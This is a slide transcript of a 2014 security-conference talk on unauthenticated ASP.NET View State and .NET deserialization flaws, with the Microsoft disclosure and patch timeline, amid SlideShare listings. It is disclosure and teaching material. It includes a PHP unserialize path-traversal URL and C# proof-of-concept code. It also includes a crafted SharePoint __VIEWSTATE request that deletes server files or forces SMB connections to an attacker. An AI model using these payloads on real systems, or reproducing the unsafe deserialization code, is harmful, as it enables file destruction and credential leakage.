iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksCyber Security Alliance
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 

More from Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 

Recently uploaded

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 

Recently uploaded (20)

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 

Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

  • 1. Application Security Forum - 2014 Western Switzerland 05-06 November 2014 - Y-Parc / Yverdon-les-Bains http://www.appsec-forum.ch Why .NET needs MACs and other serial(-ization) tales Alexandre Herzog CTO / Compass Security Schweiz AG
  • 2. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 2
  • 3. About the tale It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. I won’t cover the disclosure process in detail •Not that I don’t want to, but I don’t have time for it •Feel free to come over and discuss this afterwards –Idéalement autour d’un verre de vin ;-) 3
  • 4. About its storyteller Vaudois exilé d’abord en Valais, then Wellington (New Zealand) und jetzt Zürich Breaking stuff since 2010 for Compass Security •Previously worked for banks as sysadmin / developer Finished my MAS in Information Security in 2013 •MAS thesis about “Crypto-based security mechanisms in Windows and .NET” Author of several security advisories •And still no Twitter handle (!) 4
  • 5. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 5
  • 6. Once upon a time… September 2012, •during a standard ASP.NET web application assessment… <body> <form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> <div> <input type="hidden" […] value="" /> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> </div> 6
  • 7. Once upon a time… September 2012, •during a standard ASP.NET web application assessment… <body> <form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> <div> <input type="hidden" […] value="" /> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> </div> 7
  • 8. Once upon a time… protected override object LoadPageStateFromPersistenceMedium() { string viewState = Request.Form["__VSTATE"]; byte[] bytes = Convert.FromBase64String(viewState); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Decompress(bytes); LosFormatter formatter = new LosFormatter(); return formatter.Deserialize(Convert.ToBase64String(bytes)); } protected override void SavePageStateToPersistenceMedium(object viewState){ LosFormatter formatter = new LosFormatter(); StringWriter writer = new StringWriter(); formatter.Serialize(writer, viewState); string viewStateString = writer.ToString(); byte[] bytes = Convert.FromBase64String(viewStateString); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Compress(bytes); x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); } 8
  • 9. Once upon a time… protected override object LoadPageStateFromPersistenceMedium() { string viewState = Request.Form["__VSTATE"]; byte[] bytes = Convert.FromBase64String(viewState); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Decompress(bytes); LosFormatter formatter = new LosFormatter(); return formatter.Deserialize(Convert.ToBase64String(bytes)); } protected override void SavePageStateToPersistenceMedium(object viewState){ LosFormatter formatter = new LosFormatter(); StringWriter writer = new StringWriter(); formatter.Serialize(writer, viewState); string viewStateString = writer.ToString(); byte[] bytes = Convert.FromBase64String(viewStateString); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Compress(bytes); x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); } 9
  • 10. Once upon a time… We have •A custom implementation of the __VIEWSTATE field •Its value is stored compressed within __VSTATE •It uses the default LosFormatter object constructor •No Machine Authentication (sic) Code (MAC) is used •The __VIEWSTATE field sent to the client is therefore not integrity-protected –Despite the fact we serialize / deserialize objects… The same applies to regular ASP.NET pages •If property EnableViewStateMac is disabled (enabled by default) 10
  • 11. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 11
  • 12. Tales “Why does .NET need MACs” A View State Contains •2 bytes of header data (ASP.NET 1.1 versus 2.0+) •A tree of serialized objects (View State Bag & Serialized ASP.NET controls of the page) •A (H)MAC ensuring integrity (if configured so – default: enabled) A View State •Can be encrypted •Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields) •Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property) 12
  • 13. Tales “Why does .NET need MACs” View State handling and lifecycle 13 ASP.NET deserializes the View State and copies the values back into the controls Serialize Deserialize Request from the client comes in Response is sent to the client
  • 14. Tales “Why does .NET need MACs” State of the art of hacking View States back then: Trustwave's SpiderLabs Security Advisory TWSL2010-001: Multiplatform View State Tampering Vulnerabilities Published: 2010-02-08 Version: 1.1 SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 14
  • 15. 15
  • 16. Tales “Why does .NET need MACs” Inappropriate Microsoft advice back then (Trustwave): 16
  • 17. Tales “Why does .NET need MACs” State of the art of exploiting ASP.NET View State fields without MACs: •Abuse them for XSS •You must have an existing control on the page accepting HTML to inject your payload Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language •Implemented in their “Deface” tool •This attack was presented in MISC magazine #69 17
  • 18. Tales “Why does .NET need MACs” Back to September 2012: so ASP.NET unprotected View State fields can be misused •But “only” for XSS when a few pre-conditions are met •And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) Some pages in e.g. SharePoint do not enforce a MAC on the View State •View State on these pages is empty, so you can’t misused them for XSS 18
  • 19. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 19
  • 20. “Serialization” tales Serialization is known to be an issue in web apps •Potentially user defined content gets deserialized on the server •Depends on the technology and the application’s code •Tool “Deface” targets Apache MyFaces 1.2.8 applications Let’s see a PHP example: 20
  • 21. “Serialization” tales class Example1 { public $cache_file; function __construct() { // some PHP code... } function __destruct() { $file = "/var/www/cache/tmp/{$this->cache_file}"; if (file_exists($file)) @unlink($file); } } // some PHP code... $user_data = unserialize($_GET['data']); // some PHP code... 21
  • 22. “Serialization” tales Flaw can be exploited with the following link •http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10: "cache_file";s:15:"../../index.php";} When receiving this request, the server •Takes GET parameter “data” and “unserialize” it •Casts it to object type “Example1” •Assigns value “../../index.php” to property “cache_file” •When the page lifetime is over, method “__destruct()” of object “Example1” is called which deletes the file Can the same be done with .NET? 22
  • 23. 23
  • 24. “Serialization” tales Great research of James Forshaw (Context) Studying (and exploiting) .NET serialization via •IFormatter •XML Serialization •WCF Data Contracts •JSON But not a word about serialization of •View State field •LosFormatter object (limited object serialization) 24
  • 25. “Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object TempFileCollection deletes files in destructor [Serializable] public class TempFileCollection { private Hashtable files; // Deserialized list of files // Other stuff... ~TempFileCollection() { foreach (string file in files.Keys) { File.Delete(file); // Makes sure to delete them when // The object is destroyed! } } } 25
  • 26. “Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object FileInfo triggers SMB requests [Serializable] public class FileInfo { private string FullPath; protected FileInfo(SerializationInfo info, StreamingContext context) { // Ensures path is canonical FullPath = NormalizePath(info.GetString("FullPath")); } } string NormalizePath(string path) { string[] parts = path.Split(''); foreach(string part in parts) { currPath += "" + part; if(part[0] == '~') { // If potential short path, GetLongPathName(currPath); } // call Windows API } } 26
  • 27. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 27
  • 28. When the stories come together – My tale What if I can combine the fact I now have •A View State field without integrity protection (resp. MAC) •Known .NET objects having interesting (de)serialization actions If possible, I would be able to e.g. •Delete a file on the server •Get the server to initiate a SMB request to e.g. the attacker’s machine Can I apply it? Can it be done within the few hours left onsite? 28
  • 29. When the stories come together – My tale using System; using System.IO; using System.Text; using System.Web.UI; // created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012 public class ExploitViewstate { // Caution: both files must be the same length! static String bugusFile = @"ATTACKER~testtext.txt"; static String dummyFile = @"c:testCompasstestVS.txt"; public static void Main(string[] args) { String validViewstate = GenerateValidViewstate(); Console.WriteLine("Valid viewstate: {0}", validViewstate); } private static String GenerateValidViewstate() { FileInfo fi = new FileInfo(dummyFile); LosFormatter los = new LosFormatter(); using (StringWriter sw = new StringWriter()) { los.Serialize(sw, fi); return sw.ToString(); } } } 29
  • 30. When the stories come together – My tale C:>set csc=c:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe C:>%csc% exploitViewstate.cs && exploitViewstate.exe Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927 for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727 Copyright (C) Microsoft Corporation 2001-2005. All rights reserved. Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwI AAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs= For the PoC, we need to change the file in the above Base64 string from •c:testCompasstestVS.txt to •ATTACKER~testtext.txt 30
  • 31. When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 31
  • 32. When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 32
  • 33. When the stories come together – My tale In the SharePoint logs: 09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAA AAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d)) […] 09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5- 6190-481e-8b21-c2cb5d04222b 33
  • 34. When the stories come together – My tale Demo! When the View State MAC is disabled, you can •Delete a file on the server (via object TempFileCollection) •Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) •I wasn’t able to get a generic remote code execution (so far) –Highly dependent on the application / content of the server’s GAC –But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 34
  • 35. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 35
  • 36. Time sequence of the (patch) battle Disclosure milestones •26.09.2012 Initial contact with MSRC •19.02.2013 Microsoft aims for a fix in SharePoint in May •28.02.2013 Microsoft confirms work is under way for SkyDrive •15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC •03.07.2013 Patch again postponed (issues found during tests) •16.08.2013 Detailed answer about the next steps; BlueHat invitation •10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution) 36
  • 37. Time sequence of the (patch) battle Disclosure milestones (continued) •06.11.2013 Conference call with Microsoft •10.12.2013 December’s patch Tuesday with –MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) –MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE) –KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege) •11.12.2013 Meeting with several Microsoft people in Seattle 37
  • 38. Time sequence of the (patch) battle Disclosure milestones (continued) •05.05.2014 Release of ASP.NET 4.5.2 which forbids disabling the View State MAC •13.05.2014 May’s patch Tuesday with MS14-024 (SharePoint) •07.08.2014 Announcement that only the latest (ASP).NET framework will be supported in 2016 onward •09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247 You are now safe… … if you install all suggested WU patches 38
  • 39. Time sequence of the (patch) battle But what was the content of •MS13-100 / CVE-2013-5059 •MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?) Microsoft did their homework •A cross-product/company wide effort was made to address serialisation / View State issues •Several additional attack vectors were found and fixed 39
  • 40. Time sequence of the (patch) battle Extract of MS13-100 (CVE-2013-5059) •New namespace “Microsoft.Office.Server.Security” •New internal class SafeSerialization with methods »IsSafeBinaryFormatterStreamWithAllowList([…]) […] »IsSafeBinaryFormatterStreamCommon( […]) •Usage within SharePoint: 40
  • 41. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 41
  • 42. Is the ugly bug really dead? Yes if you patch adequately •No pages in SharePoint should be vulnerable •No pages in Outlook Web Access should be vulnerable •Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed This patch securing the Viewstate is controversial •“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” But how is the MAC computed? •Using the keys defined in <machineKey /> 42
  • 43. Is the ugly bug really dead? Yes if you patch adequately •No pages in SharePoint should be vulnerable •No pages in Outlook Web Access should be vulnerable •Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed This patch securing the Viewstate is controversial •“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” But how is the MAC computed? •Using the keys defined in <machineKey /> 43
  • 44. Is the ugly bug really dead? Result of an audit searching for static machineKey entries 44
